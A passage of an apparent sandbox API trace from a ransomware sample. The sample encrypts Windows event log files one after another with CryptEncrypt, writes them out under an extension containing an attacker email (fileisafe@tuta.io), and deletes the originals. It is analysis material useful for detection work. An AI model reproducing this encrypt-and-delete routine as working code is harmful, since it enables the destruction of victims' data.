Service.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.366] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.366] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.366] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.366] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0064.366] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71f80) returned 1 [0064.366] CryptSetKeyParam (hKey=0xf71f80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.366] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.368] CryptEncrypt (in: hKey=0xf71f80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.368] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.370] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d00) returned 1 [0064.370] CryptSetKeyParam (hKey=0xf71d00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.370] CryptEncrypt (in: hKey=0xf71d00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0064.370] CryptDestroyKey (hKey=0xf71d00) returned 1 [0064.370] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0064.370] CryptDestroyKey (hKey=0xf71f80) returned 1 [0064.370] CloseHandle (hObject=0x338) returned 1 [0064.370] CloseHandle (hObject=0x30c) returned 1 [0064.372] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Known Folders API Service.evtx" (normalized: "c:\\logs\\microsoft-windows-known folders api service.evtx")) returned 1 [0064.373] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.373] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0064.374] GetFileSizeEx (in: hFile=0x30c, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.374] CloseHandle (hObject=0x30c) returned 1 [0064.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 0x20 [0064.374] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.374] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0064.374] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.374] SetFilePointerEx (in: hFile=0x30c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.374] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.374] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71a00) returned 1 [0064.374] CryptSetKeyParam (hKey=0xf71a00, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.374] ReadFile (in: hFile=0x30c, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.378] CryptEncrypt (in: hKey=0xf71a00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.378] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.380] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71f40) returned 1 [0064.380] CryptSetKeyParam (hKey=0xf71f40, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.380] CryptEncrypt (in: hKey=0xf71f40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0064.380] CryptDestroyKey (hKey=0xf71f40) returned 1 [0064.380] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0064.380] CryptDestroyKey (hKey=0xf71a00) returned 1 [0064.380] CloseHandle (hObject=0x30c) returned 1 [0064.380] CloseHandle (hObject=0x338) returned 1 [0064.382] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-LiveId%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-liveid%4operational.evtx")) returned 1 [0064.384] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.384] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.384] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.384] CloseHandle (hObject=0x338) returned 1 [0064.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 0x20 [0064.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.384] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.384] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.384] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.384] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0064.384] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0064.384] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.384] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.387] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.387] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.389] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71d80) returned 1 [0064.389] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.389] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70, dwBufLen=0x70 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x70) returned 1 [0064.389] CryptDestroyKey (hKey=0xf71d80) returned 1 [0064.389] WriteFile (in: hFile=0x30c, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x122, lpOverlapped=0x0) returned 1 [0064.389] CryptDestroyKey (hKey=0xf72100) returned 1 [0064.389] CloseHandle (hObject=0x338) returned 1 [0064.389] CloseHandle (hObject=0x30c) returned 1 [0064.391] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-MUI%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-mui%4admin.evtx")) returned 1 [0064.516] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.516] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.586] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.587] CloseHandle (hObject=0x338) returned 1 [0064.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 0x20 [0064.587] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.587] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.587] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.587] SetFilePointerEx (in: hFile=0x338, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.587] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.593] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0064.593] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.593] ReadFile (in: hFile=0x338, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.595] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.595] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.597] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0064.597] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.597] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0064.597] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0064.597] WriteFile (in: hFile=0x300, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0064.597] CryptDestroyKey (hKey=0xf72100) returned 1 [0064.597] CloseHandle (hObject=0x338) returned 1 [0064.597] CloseHandle (hObject=0x300) returned 1 [0064.599] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NCSI%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ncsi%4operational.evtx")) returned 1 [0064.600] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.600] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.601] GetFileSizeEx (in: hFile=0x300, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.601] CloseHandle (hObject=0x300) returned 1 [0064.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 0x20 [0064.601] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.601] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x300 [0064.601] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.601] SetFilePointerEx (in: hFile=0x300, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.601] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.601] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf72100) returned 1 [0064.601] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.601] ReadFile (in: hFile=0x300, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.603] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.603] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.605] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf71ec0) returned 1 [0064.605] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.605] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90, dwBufLen=0x90 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x90) returned 1 [0064.605] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0064.605] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x142, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x142, lpOverlapped=0x0) returned 1 [0064.605] CryptDestroyKey (hKey=0xf72100) returned 1 [0064.605] CloseHandle (hObject=0x300) returned 1 [0064.605] CloseHandle (hObject=0x338) returned 1 [0064.607] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-NetworkProfile%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-networkprofile%4operational.evtx")) returned 1 [0064.609] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.609] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0064.610] GetFileSizeEx (in: hFile=0x328, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.610] CloseHandle (hObject=0x328) returned 1 [0064.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 0x20 [0064.611] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0064.611] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0064.611] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.611] SetFilePointerEx (in: hFile=0x328, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38efa68 | out: lpNewFilePointer=0x0) returned 1 [0064.611] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.611] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa20, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa7c | out: phKey=0x38efa7c*=0xf71ec0) returned 1 [0064.611] CryptSetKeyParam (hKey=0xf71ec0, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.611] ReadFile (in: hFile=0x328, lpBuffer=0x3e5c020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x38efaa4, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesRead=0x38efaa4*=0x11000, lpOverlapped=0x0) returned 1 [0064.613] CryptEncrypt (in: hKey=0xf71ec0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010, dwBufLen=0x11010 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x11010) returned 1 [0064.613] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x11010, lpOverlapped=0x0) returned 1 [0064.615] CryptImportKey (in: hProv=0xf466e8, pbData=0x38efa14, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x38efa80 | out: phKey=0x38efa80*=0xf72080) returned 1 [0064.615] CryptSetKeyParam (hKey=0xf72080, dwParam=0x1, pbData=0x38efb30, dwFlags=0x0) returned 1 [0064.615] CryptEncrypt (in: hKey=0xf72080, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80, dwBufLen=0x80 | out: pbData=0x3e5c020*, pdwDataLen=0x38efa40*=0x80) returned 1 [0064.615] CryptDestroyKey (hKey=0xf72080) returned 1 [0064.615] WriteFile (in: hFile=0x338, lpBuffer=0x3e5c020*, nNumberOfBytesToWrite=0x132, lpNumberOfBytesWritten=0x38efa88, lpOverlapped=0x0 | out: lpBuffer=0x3e5c020*, lpNumberOfBytesWritten=0x38efa88*=0x132, lpOverlapped=0x0) returned 1 [0064.615] CryptDestroyKey (hKey=0xf71ec0) returned 1 [0064.615] CloseHandle (hObject=0x328) returned 1 [0064.615] CloseHandle (hObject=0x338) returned 1 [0064.617] DeleteFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4operational.evtx")) returned 1 [0064.618] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x38efb30 | out: pbBuffer=0x38efb30) returned 1 [0064.618] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: "c:\\logs\\microsoft-windows-ntfs%4whc.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0064.618] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x38efac8 | out: lpFileSize=0x38efac8*=69632) returned 1 [0064.618] CloseHandle (hObject=0x338) returned 1 [0064.618] GetFileAttributesW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-Ntfs%4WHC.evtx" (normalized: 